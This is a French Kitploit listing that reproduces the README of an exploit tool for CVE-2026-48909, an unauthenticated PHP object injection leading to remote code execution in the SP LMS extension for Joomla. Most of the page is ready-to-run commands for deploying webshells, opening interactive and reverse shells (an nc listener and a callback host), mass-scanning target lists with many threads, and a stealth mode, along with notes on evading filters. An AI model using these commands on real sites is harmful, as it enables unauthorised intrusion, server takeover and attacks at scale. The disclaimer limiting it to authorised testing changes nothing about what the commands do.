Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - Exploit d'injection d'objets PHP non authentifiée menant à une exécution de code à distance (RCE) pour l'extension Joomla SP LMS versions <= 4.1.3. Exploite la désérialisation du cookie lmsOrders pour écrire un webshell via la chaîne de gadgets Joomla FormattedtextLogger. Inclut un shell interactif, la découverte de chemins et le nettoyage. Réservé aux tests de sécurité autorisés uniquement. | Kitploit
Outils/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
Analyse des VulnérabilitésAnalyse de CodeExploitationShellcodeExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed Teaming
Développement de Charges Utiles
Labs et Pratique
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

Voir le dépôt
215il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

CVE-2026-48909 - Exploit d'injection d'objets PHP non authentifiée menant à une exécution de code à distance (RCE) pour l'extension Joomla SP LMS versions <= 4.1.3. Exploite la désérialisation du cookie lmsOrders pour écrire un webshell via la chaîne de gadgets Joomla FormattedtextLogger. Inclut un shell interactif, la découverte de chemins et le nettoyage. Réservé aux tests de sécurité autorisés uniquement.

Partager

CVE-2026-48909

Joomla SP LMS — Injection d'objets PHP non authentifié → RCE

Python Version CVSS License Platform

Outil de preuve de concept pour l'évaluation de CVE-2026-48909
Auteur : Sudeepa Wanigarathna

joomla1

[!IMPORTANT] Utilisation autorisée uniquement. Cet outil est destiné à la recherche en sécurité, à l'éducation et aux tests sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite. L'accès non autorisé à des systèmes informatiques est illégal. L'auteur décline toute responsabilité en cas d'utilisation abusive.


Table des matières

  • Aperçu
  • Détails de la vulnérabilité
  • Fonctionnalités
  • Installation
  • Démarrage rapide
  • Guide d'utilisation
  • Référence des commandes
  • Types de charges utiles
  • Chaîne d'attaque
  • Exemples de sortie
  • Dépannage
  • Structure du dépôt
  • Historique des versions
  • Avertissement
  • Auteur

Aperçu

CVE-2026-48909 est une injection d'objets PHP non authentifié critique dans l'extension SP LMS de Joomla. Cet outil implémente la chaîne d'attaque complète afin que les professionnels de la sécurité puissent valider l'impact dans un environnement de laboratoire ou autorisé.

Il couvre la détection, la découverte de chemin, la livraison de charge utile, l'exploitation interactive post-exploitation (lorsque autorisé), l'évaluation de masse et le nettoyage optionnel.


Détails de la vulnérabilité

AttributValeur
ID CVECVE-2026-48909
CVSS9,5 (Critique)
Vecteur d'attaqueRéseau — non authentifié
ImpactExécution de code à distance
Produit affectéJoomla SP LMS
Versions affectées1.0.0 – 4.1.3
Version corrigéeSP LMS 4.1.4+
Chaîne de gadgetsNécessite Joomla < 5.2.2

Matrice de compatibilité

ComposantVersionRCE
SP LMS< 4.1.4Vulnérable
SP LMS≥ 4.1.4Corrigé
Joomla< 5.2.2Chaîne de gadgets utilisable
Joomla≥ 5.2.2Chaîne de gadgets corrigée

Fonctionnalités

Cœur

CapacitéDescription
Exploitation non authentifiéeAucune identification requise
Charges utiles multiples7 variantes de webshell / exécution
Shell interactifSession avec historique des commandes après déploiement
Découverte de cheminSondage automatique des chemins inscriptibles
NettoyageSupprimer le webshell déployé après les tests

Évaluation et opérations

CapacitéDescription
Analyse de masseListes de cibles multi-threadées (1000+)
Support proxyHTTP/SOCKS (Burp, ZAP, etc.)
Shell inverséCharges utiles basées sur un écouteur
Mode furtifCanaux de commande par en-têtes / POST
RandomisationNoms de shell UUID, rotation du User-Agent
RapportsExport en JSON, HTML ou CSV
Aides à la détectionVérifications de version Joomla, --check-only, --safe-mode

Notes d'évasion

  • Évite autant que possible les caractères bloqués par le filtre cmd de Joomla
  • Chemin d'écriture PHP encodé en hexadécimal pour réduire les problèmes de padding base64 / slash
  • Délais configurables et rotation des User-Agents
  • Logique de réessai sur plusieurs candidats d'injection / chemin

Installation

Prérequis

  • Python 3.6+
  • pip
  • Accessibilité réseau à la/aux cible(s) testée(s)

Configuration

cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

Dépendances

requests>=2.31.0
urllib3>=2.0.0

argparse fait partie de la bibliothèque standard Python ; il n'a pas besoin d'être installé via pip.


Démarrage rapide

Remplacez https://target.example par une cible de laboratoire ou autorisée uniquement.

Cible unique — découverte de chemin + shell interactif

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Vérifications sécurisées (sans exploitation)

python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

Analyse de masse

python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

Shell inversé (laboratoire autorisé)

# Écouteur
nc -lvnp 4444

# Hôte d'exploitation
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

Guide d'utilisation

Découverte de chemin

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

Chemin inscriptible connu

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

Session interactive

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Commande unique

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

Charge utile furtive + interactif

python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

Proxy (Burp / ZAP)

python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

Nettoyage

python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

Format de la liste de cibles

https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

Référence des commandes

Cible

ArgumentDescription
targetURL de la cible unique
--targets, -T FILEFichier de cibles (une URL par ligne)
--path PATHChemin absolu sur le serveur pour le webshell
--shell-type TYPEminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMENom du fichier webshell (par défaut : x.php)

Réseau

ArgumentDescription
--timeout SECONDSDélai d'attente des requêtes (par défaut : 15)
--insecureIgnorer la vérification du certificat TLS
--proxy URLex. http://127.0.0.1:8080
--random-uaRotation du User-Agent (activé par défaut)
--delay SECONDSDélai entre les requêtes

Shell inversé

ArgumentDescription
--reverse-host HOSTHôte de l'écouteur
--reverse-port PORTPort de l'écouteur

Modes

Télécharger l’outil